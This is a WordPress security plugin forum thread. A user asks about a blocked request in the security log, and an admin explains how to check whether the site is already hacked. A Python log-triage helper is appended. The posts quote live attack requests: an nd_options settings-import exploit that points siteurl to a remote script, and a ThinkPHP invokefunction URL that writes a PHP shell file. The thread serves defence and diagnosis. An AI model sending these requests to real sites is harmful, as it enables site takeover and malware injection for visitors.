Security Log Event Codes


This topic contains 78 replies, has 16 voices, and was last updated by AITpro Admin 2 months, 1 week ago.

    #35544

    Bub
    Participant

    Done and done…. Thanks. This topic should now be closed.

    #35545

    Bub
    Participant

    Again, thanks.

    #37723

    sergeykar
    Participant

    I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing its job – however, is there a weakness this attempt is trying to exploit?

    [403 GET Request: 06.08.2019 - 10:15]
    BPS: 3.5
    WP: 5.2.2
    Event Code: WPADMIN-SBR
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 159.69.154.78
    Host Name: static.78.154.69.159.clients.your-server.de
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
    QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36

    #37724

    AITpro Admin
    Keymaster

    This is either a probe looking for existing injected hacker code in your website’s Source Code or a hacker trying to exploit an existing hack injection on your website’s Source Code. To check if your website is hacked do the steps below:

    1. Go to your website’s home page.
    2. Right mouse click and click View page source (Google Chrome) or a similar command for other Browsers.
    3. Use your Browser’s Find… command (Google Chrome – located under settings > Find…) and enter this search string: nd_options
    4. If you see/find Source Code that looks like this below then your website is hacked.
    5. Let me know if your Browser Find/Search finds any search results or not.

    httx://expat.ca/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jfjvc.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace(, httx://expat.ca/jfjvc.php, httx://expat.ca/wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]httxs://jackielovedogs.com/pret.js?l=1&[nd_options_end_option], httx://expat.ca/wp-admin/admin-post.phpnd_options_value_import_settings=home[nd_options_option_value]httxs://jackielovedogs.com/pret?l=1&[nd_options_end_option],
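
A triage helper for log entries like the one posted above, as an added example that is not part of the original thread and is not BPS code: it parses the entry layout shown in the log and pulls out the option name (such as siteurl) and the value carried in each nd_options_value_import_settings request. The sample log is constructed, with placeholder addresses and a placeholder URL, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed sample in the log layout shown above; IPs and URL are placeholders.
SAMPLE_LOG = """\
[403 GET Request: 06.08.2019 - 10:15]
Event Code: WPADMIN-SBR
REMOTE_ADDR: 192.0.2.10
QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://example.invalid/x.js?l=1&[nd_options_end_option]

[403 GET Request: 06.08.2019 - 10:20]
Event Code: WPADMIN-SBR
REMOTE_ADDR: 198.51.100.7
QUERY_STRING: action=heartbeat
"""

ENTRY_START = re.compile(r"^\[(\d{3}) (\w+) Request: ([^\]]+)\]$")
# Option name, then the value between the two bracketed markers seen in the logged request.
PAIR = re.compile(r"(\w+)\[nd_options_option_value\](.*?)\[nd_options_end_option\]")

def parse_entries(text):
    """Split a log into dicts, one per '[403 GET Request: ...]' entry."""
    entries, current = [], None
    for line in text.splitlines():
        line = line.strip()
        m = ENTRY_START.match(line)
        if m:
            current = {"status": m.group(1), "method": m.group(2), "time": m.group(3)}
            entries.append(current)
        elif current is not None and ":" in line:
            key, _, value = line.partition(":")  # split on the first colon only
            current[key.strip()] = value.strip()
    return entries

def nd_options_hits(entries):
    """Return (time, source IP, option name, value) for each nd_options import attempt."""
    hits = []
    for e in entries:
        query = unquote(e.get("QUERY_STRING", ""))  # also catches %5B/%5D-encoded brackets
        if "nd_options_value_import_settings" not in query:
            continue
        for option, value in PAIR.findall(query):
            hits.append((e["time"], e.get("REMOTE_ADDR", ""), option, value.rstrip("&")))
    return hits

if __name__ == "__main__":
    for hit in nd_options_hits(parse_entries(SAMPLE_LOG)):
        print(*hit, sep=" | ")
```

Grouping the hits by option name and value shows which settings the requests target and which URL to look for when checking the page source.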